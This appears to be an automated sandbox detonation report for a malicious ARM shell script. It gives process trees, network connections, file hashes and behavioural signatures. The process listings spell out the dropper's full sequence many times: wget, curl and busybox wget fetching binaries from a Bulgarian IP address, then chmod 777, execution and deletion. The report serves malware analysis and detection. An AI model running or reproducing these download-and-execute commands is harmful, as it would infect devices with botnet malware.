[curl -O http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/bin/chmod

[chmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8

[./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/bin/rm

[rm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/usr/bin/wget

[wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/bin/chmod

[chmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD

[./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/bin/rm

[rm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/usr/bin/wget

[wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/bin/chmod

[chmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d

[./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/bin/rm

[rm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/usr/bin/wget

[wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/bin/chmod

[chmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF

[./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/bin/rm

[rm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/usr/bin/wget

[wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/bin/chmod

[chmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD

[./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/bin/rm

[rm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/usr/bin/wget

[wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/bin/chmod

[chmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d

[./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/bin/rm

[rm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/usr/bin/wget

[wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/bin/chmod

[chmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF

[./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/bin/rm

[rm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/usr/bin/wget

[wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/bin/chmod

[chmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP

[./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/bin/rm

[rm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/usr/bin/wget

[wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/bin/chmod

[chmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK

[./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/bin/rm

[rm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/usr/bin/wget

[wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/bin/chmod

[chmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4

[./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/bin/rm

[rm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/usr/bin/wget

[wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/bin/chmod

[chmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir

[./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/bin/rm

[rm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/usr/bin/wget

[wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/bin/chmod

[chmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C

[./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/bin/rm

[rm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/usr/bin/wget

[wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/bin/chmod

[chmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7

[./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/bin/rm

[rm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/usr/bin/wget

[wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/bin/chmod

[chmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8

[./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/bin/rm

[rm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/usr/bin/wget

[wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/bin/chmod

[chmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F

[./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/bin/rm

[rm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/usr/bin/wget

[wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/bin/chmod

[chmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp

[./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/bin/rm

[rm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/usr/bin/wget

[wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/bin/chmod

[chmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2

[./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/bin/rm

[rm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/usr/bin/wget

[wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/bin/chmod

[chmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3

[./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/bin/rm

[rm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.65.91:443 tcp
US 151.101.65.91:443 tcp
GB 89.187.167.9:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-28 01:06

Reported

2024-10-28 01:09

Platform

debian9-armhf-20240611-en

Max time kernel

13s

Max time network

14s

Command Line

[/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP N/A
N/A /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK N/A
N/A /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 N/A
N/A /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F N/A
N/A /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp N/A
N/A /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 N/A
N/A /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 N/A
N/A /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir N/A
N/A /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C N/A
N/A /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /usr/bin/curl N/A
File opened for modification /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /usr/bin/curl N/A
File opened for modification /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /usr/bin/curl N/A
File opened for modification /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /usr/bin/curl N/A
File opened for modification /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /usr/bin/curl N/A
File opened for modification /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 /usr/bin/curl N/A
File opened for modification /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 /usr/bin/curl N/A
File opened for modification /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /usr/bin/curl N/A
File opened for modification /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 /usr/bin/curl N/A
File opened for modification /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /usr/bin/curl N/A

Processes

/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh

[/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/bin/chmod

[chmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP

[./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/bin/rm

[rm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/usr/bin/wget

[wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/bin/chmod

[chmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK

[./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/bin/rm

[rm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/usr/bin/wget

[wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/bin/chmod

[chmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4

[./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/bin/rm

[rm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/usr/bin/wget

[wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/bin/chmod

[chmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F

[./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/bin/rm

[rm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/usr/bin/wget

[wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/bin/chmod

[chmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp

[./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/bin/rm

[rm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/usr/bin/wget

[wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/bin/chmod

[chmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2

[./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/bin/rm

[rm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/usr/bin/wget

[wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/bin/chmod

[chmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3

[./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/bin/rm

[rm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/usr/bin/wget

[wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/bin/chmod

[chmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir

[./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/bin/rm

[rm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/usr/bin/wget

[wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/bin/chmod

[chmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C

[./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/bin/rm

[rm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/usr/bin/wget

